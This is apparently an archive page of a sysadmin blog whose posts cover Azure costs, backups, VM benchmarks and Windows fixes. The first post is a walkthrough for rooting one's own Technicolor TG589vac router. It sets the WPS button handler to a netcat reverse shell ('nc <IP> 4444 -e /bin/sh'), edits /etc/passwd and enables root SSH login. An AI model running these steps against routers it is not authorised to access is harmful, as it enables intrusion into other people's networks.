Tuesday, 15 May 2018

LAN side root on Technicolor MediaAccess TG589vac

Here is a method for gaining root access to your Technicolor TG589vac router (and probably other Technicolor models).

Unfortunately, this only works on European models that ship with SSH and an engineer account enabled.



Tested working on firmware revision 17.2.0278

It's a bit more involved than the older methods but here goes:

First, set up a machine listening with netcat (make a note of its IP):

nc -lvvp 4444

Log into the engineer account using SSH (the password is printed on the router's label as the access code), then set the WPS button handler to connect back to your listening machine:

get uci.button.button.@wps.handler
set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh'
get uci.button.button.@wps.handler




Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top).

Congrats, you now have a root shell.




Once logged in, you can set up root login via SSH. The following reads the passwd file, changes the root shell from /bin/false to /bin/ash, then reads it back:

cat /etc/passwd
sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd
cat /etc/passwd

Make sure the second output of the passwd file shows the corrected root shell.

Next, configure dropbear to allow root login via SSH:

uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit

Restart dropbear for the change to take effect:

/etc/init.d/dropbear restart

The root password is root :)

Log in via SSH and set a new root password:

root@dsldevice:~# passwd root
New password:
Retype password:
Password for root changed by root

Finally, set the WPS button handler back using UCI:

uci set button.wps.handler='wps_button_pressed.sh'
uci commit







Monday, 12 March 2018

StorSimple Upload Calculator

Some time ago, I played around with the on-premises Azure StorSimple virtual appliance. Unfortunately, I picked a new blob storage account in cool, RA-GRS mode, which has a very expensive per-10k-write cost, and uploading 750 GiB of data cost me quite a bit of money.

Since then, we have seen Azure storage transaction costs come way down, especially on the v1 general purpose storage account type.

To help you get an estimate of storage and transaction costs for uploading bulk data into a StorSimple device, I've created a calculator here.

To begin, simply key in the amount of storage (in GiB) you plan to upload, plus the per-10k-write and per-GB costs for your region, and the calculator will give a guide to the expected transaction and storage cost of uploading the data.
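
For reference, here is a rough Python sketch of the arithmetic I believe the calculator performs, assuming one write transaction per 512 KiB chunk and ignoring deduplication and compression. The prices in the example are made up; use the real figures for your region.

def storsimple_upload_cost(gib_uploaded, per_10k_writes, per_gb_month, chunk_kib=512):
    # Convert GiB to KiB, then to the number of chunks written.
    chunks = gib_uploaded * 1024 * 1024 / chunk_kib
    transaction_cost = chunks / 10000 * per_10k_writes
    storage_cost = gib_uploaded * per_gb_month  # approximate: billed per GB, not GiB
    return transaction_cost, storage_cost

# Illustrative prices only.
tx, store = storsimple_upload_cost(750, per_10k_writes=0.0004, per_gb_month=0.03)
print("Transaction cost: %.2f, storage per month: %.2f" % (tx, store))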





The calculator does not estimate transactions for day-to-day access, nor does it include cloud snapshot transactions or storage.

Be aware that the 512 KiB chunk size reduces transaction costs, but also significantly reduces deduplication; the Microsoft pricing page explains this.

This first version of the calculator requires you to key in the per-10k-write and per-GB costs for your chosen region and storage account type. It defaults to v1, LRS, North Europe, GBP prices as of the time of writing. I've purposely left out the currency symbol, so it should work with most currencies as-is.

Hopefully, with some additional time, I'll be able to add a drop-down box to choose storage account type and location and have it fill in those costs for you automatically.

Thursday, 8 March 2018

Windows Server 2012 R2 & 2016 updates showing as not applicable

Because the Spectre and Meltdown patches caused problems with various antivirus products, Microsoft added a registry key check to ALL January and February 2018 Windows Server patches (not just the Spectre and Meltdown patches).

If you find yourself in the situation where your servers are not detecting the latest update rollups, check this Microsoft post:

https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software

Most AV vendors set this flag in the registry correctly, but some do not, and if you have servers without AV for legitimate reasons, you may find yourself unable to patch those machines.

Affected servers simply will not be offered the update rollups from WSUS or Microsoft Update. In WSUS, the rollups will show as 'not applicable' for the server.

Setting the flag resolves the issue, but unless you are actively checking that servers are updating properly, this may go unnoticed. Since the updates are 'not applicable', WSUS will show the server as fully patched and not requiring them, which is a bad situation to be in.
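
If you need to set the flag yourself on servers without AV, the key and value documented in the linked article can be set with a short elevated script. Here is a sketch in Python via winreg; reg.exe or Group Policy Preferences would do the same job.

import winreg

# QualityCompat value from the linked Microsoft article.
key = winreg.CreateKey(
    winreg.HKEY_LOCAL_MACHINE,
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat",
)
winreg.SetValueEx(
    key,
    "cadca5fe-87d3-4b96-b7fb-a231484277cc",  # value name per the article
    0,
    winreg.REG_DWORD,
    0,  # 0x00000000 signals AV compatibility
)
winreg.CloseKey(key)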

Friday, 9 February 2018

How to change backup retention for an Azure VM in Recovery Services Vault

This seemed a little hidden in the portal and I couldn't find any guides online, so here is how to change the backup retention for an Azure virtual machine within the portal.

Hidden away here in the Azure Backup FAQ, Microsoft states:

"When a new policy is applied, schedule and retention of the new policy is followed. If retention is extended, existing recovery points are marked to keep them as per new policy. If retention is reduced, they are marked for pruning in the next cleanup job and subsequently deleted."

In other words, if retention is reduced, older recovery points will be deleted once the policy is changed; if retention is extended, existing recovery points are kept according to the new policy.

How to change your policy

  • Log into the portal and find your Recovery Services Vault.


  • Click on the vault, then find 'Backup policies' in the menu blade.


  • Click '+ Add', select a policy type, fill in the policy details and click Create.


  • Once the policy is created, go back to the main Recovery Services Vault tab and click the vault.


  • Find 'Backup Items' in the menu blade.

 
  • Click Azure Virtual Machine.


  • Click on the VM you want to change.


  • Click the settings button.


  • Click 'Backup Policy'.


  • Choose the new backup policy and click Save.

Once the deployment shows as succeeded in the notifications area, go back to the 'Backup policies' blade, click the new policy, then click 'Associated Items' to check that the correct virtual machines have been assigned the policy.

Friday, 24 November 2017

Azure Burstable VMs - Will it Burst?



Microsoft has announced its new B-Series burstable VMs. These look like a great option for low-priority, low-requirement workloads. If you're anything like me, you look after a bunch of virtual machines that don't need much CPU most of the time, so paying for dedicated cores on Azure seems expensive.


B-Series VMs allow your machine to sit idle for most of the day but burst up to the full core allocation for short periods. These SKUs are very affordable compared with the other VM series.


How, then, do you know if your VM is idle enough to run on a burstable SKU? You could carefully check the performance metrics of every virtual machine you own - or you could run this script to get a quick answer and then dive deeper on the machines that look promising.


Check out the repo on GitHub and read the description below to find out more.





Azure-Burst-Check

A script to check whether your VM is a candidate for a burstable VM size. Good for checking that your VM is idle enough, for enough of the time, that it could run as a burstable machine.

The script loads the VM diagnostics for a specified period and then does some rudimentary checks to see whether the VM could run on a burstable SKU. It only looks at CPU usage on the host and the memory size of the input VM; it does not take into account disk or any other resource constraints. Ensure the burstable size shown fits your other requirements before resizing the machine.


Additionally, the script assumes that 25% utilisation on a 4-core VM is basically saturating a single core and would be fine on a 1-core VM. The script also treats all cores as equal, which is not the case in reality - an Av1-Series core is considerably slower than a Dv2-Series core.
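
As a concrete illustration, this is roughly the core-equivalents logic described above, sketched in Python. This is my simplification, not the script itself, and the thresholds for the three ratings are assumptions rather than the script's actual values.

def busy_core_equivalents(avg_cpu_percent, vcpus):
    # 25% average utilisation on a 4-core VM ~= 1 fully busy core.
    return avg_cpu_percent / 100.0 * vcpus

def rate_fit(busy_cores, candidate_vcpus):
    # Crude three-bucket rating; the real thresholds may differ.
    if busy_cores <= candidate_vcpus * 0.5:
        return "Good fit"
    if busy_cores <= candidate_vcpus:
        return "Possible fit"
    return "Poor fit"

print(rate_fit(busy_core_equivalents(25, 4), 1))  # Possible fit on a 1-core SKU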


The output will show all burstable VM sizes with an applicability rating for the input VM of "Good fit", "Possible fit" or "Poor fit".


The Throttled column shows the number of data points that would have caused throttling of the VM because the machine ran out of credits. This is a little misleading: if the machine had actually been throttled, it would have taken longer to do its work and would likely have throttled for longer than the figure shows. If there is any significant throttling (more than about 5%), I would advise that the VM size is unsuitable unless the VM is very low priority.


If you do decide to switch to a burstable VM, I would suggest setting an alert on the new credits metric so you know when the VM is running low on credits and can increase the VM size accordingly.


Charts

[Chart: Example VM that is unsuitable for the B1s SKU - out of credits]

[Chart: Example VM that is suitable for the B2s SKU]

Thursday, 12 October 2017

Unable to create new files and folders on NAS share from HPE StoreOnce device. isFileExists

Issue


Unable to create new files and folders on a NAS share from an HPE StoreOnce device. This may also affect other non-Windows SMB server implementations.

You see errors like the following in Windows Explorer:


Could not find this item
This is no longer located in <%3 Null:OpText>. Verify the item's location and try again.


There is a problem accessing \\server\sharename
Make sure you are connected to the network and try again.
sharename

You see errors like the following in Veeam Agent for Windows Backup log:


Error: The specified network name is no longer available. Failed to process [isFileExisits]

Cause


The 'Microsoft network client: Digitally sign communications (always)' policy setting is set to Enabled.

Resolution


Set the following policy to Disabled and reboot the machine:

Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Microsoft network client: Digitally sign communications (always)
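
If you would rather script it than click through the policy editor, this GPO maps to the RequireSecuritySignature value under the LanmanWorkstation service. Here is a sketch in Python (run elevated; the reboot is still needed):

import winreg

# "Microsoft network client: Digitally sign communications (always)"
# maps to RequireSecuritySignature under the workstation service.
key = winreg.OpenKey(
    winreg.HKEY_LOCAL_MACHINE,
    r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters",
    0,
    winreg.KEY_SET_VALUE,
)
winreg.SetValueEx(key, "RequireSecuritySignature", 0, winreg.REG_DWORD, 0)  # 0 = Disabled
winreg.CloseKey(key)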

Thursday, 17 August 2017

Azure CPU Price to Performance Roundup

I have recently been running some benchmarks on Azure Virtual Machines... Lots of benchmarks!

Update: Script published on GitHub here! This is not a finished product and is a bit "hacky" - you have been warned! :)

In fact, I've written a script that powers up each VM type available to me on an MSDN subscription and makes it run Cinebench R15. My MSDN subscription has the default cores-per-region limit, so the largest machine I was able to test was the 20-core D15_v2.

The script ran the benchmark 3 times to try to account for time-based variance such as background processes. I tried to minimise background processes by disabling Windows Update and Defender on the machine.

The time taken to run serially through all of the machine types available to me, running Cinebench 3 times on each, was not as long as I initially expected - about 24 hours for a full run. Because of this, I'm open to running other benchmarks that can be run from the command line and output results in some standard fashion. I might do a straw poll if anyone is interested.

Keep in mind that Cinebench only tests CPU performance, so this will not be relevant for other machine uses such as GPU or Disk IO.

Price to Performance

Price to performance for each VM series and CPU type was calculated by dividing the Cinebench score (the average of 3 runs) by the price per month of the virtual machine. The results are displayed as an average of all the VM types in the series.
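
The maths is nothing more than a ratio, along these lines (the numbers in the example are made up, not real benchmark results or prices):

def price_performance(cinebench_scores, monthly_price):
    # Average the three runs, then divide by the monthly VM price.
    return sum(cinebench_scores) / len(cinebench_scores) / monthly_price

print(price_performance([520, 515, 525], 95.0))  # points per unit of currency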




From the results, you can see that the F series VM is by far the best performing per pound spent. The defunct G series VM is the most expensive for CPU.


Real world Cinebench R15 results vs Microsoft 'Azure Compute Unit' figures

I have normalised the Cinebench per-core and per-thread scores and the ACU score for each VM type, then averaged the normalised values across each VM series.
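
By 'normalised' I mean each figure was scaled against the best performer in the set, roughly like this (assuming divide-by-max normalisation):

def normalise(values):
    # Scale so the best performer in the set becomes 1.0.
    top = max(values)
    return [v / top for v in values]

print(normalise([142, 118, 96]))  # -> [1.0, 0.83, 0.68] (approx.)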




The best performing per-core virtual machine type is the H series, using the Intel Xeon E5-2667 v3 Haswell at 3.2 GHz. 

Looking at the results, almost all of the CPUs (relative to the H series) perform in line with their respective ACU scores, which means the ACU is a good benchmark for gauging relative CPU performance.

The only outlier on this chart is the Dv3 series when looking at per-core values. Since this VM uses Hyper-Threading, there are two threads per core, so it scores significantly better per core than the other non-SMT virtual machine types. This is, however, reflected in the pricing of the VM, so the H series is still top dog on CPU price to performance.

A final note

I have looked at the variance in per-core and per-thread scores (the multi-core score divided by the number of cores or threads), and the variance across all the VM types in a series is very low. The only noticeable exception is the G series, where the Cinebench R15 multi-core score does not scale linearly: per-core scores go down as the VM size increases. It's probably worth running single-core benchmarks on these machines to see whether there is some artificial limiting happening or whether this is due to Intel Turbo Boost kicking in on the CPU.





Let me know if you can think of a good benchmark to run across the entire range of Azure VMs.

Here is a Google Sheet with all of my results. 

Here is the script

Dave.